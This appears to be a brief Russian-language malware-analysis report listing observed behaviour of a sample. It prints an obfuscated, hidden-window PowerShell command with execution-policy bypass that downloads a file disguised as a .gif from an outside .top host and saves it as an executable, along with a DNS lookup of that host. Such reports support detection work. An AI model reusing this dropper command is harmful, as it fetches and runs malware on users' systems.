Техническая информация
- http://www.basopoew.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowErSHELL.EXE -EXECUTiOnpOlIcY byPaSs -noPROFIle -wiNdoWstylE hIDDen (neW-ObJecT SYStem.net.wEbClIEnt).dOWNLOadFiLe('http://www.basopoew.top/read.php?f=1.gif','%appDATA%.Ex...
- DNS ASK ba###oew.top
- '<SYSTEM32>\cmd.exe' /C "PowErSHELL.EXE -EXECUTiOnpOlIcY byPaSs -noPROFIle -wiNdoWstylE hIDDen (neW-ObJecT SYStem.net.wEbClIEnt).dOWNLOadFiLe('http://www.basopoew.top/read.php?f=1.gif','%appDATA%.Ex...' (со скрытым окном)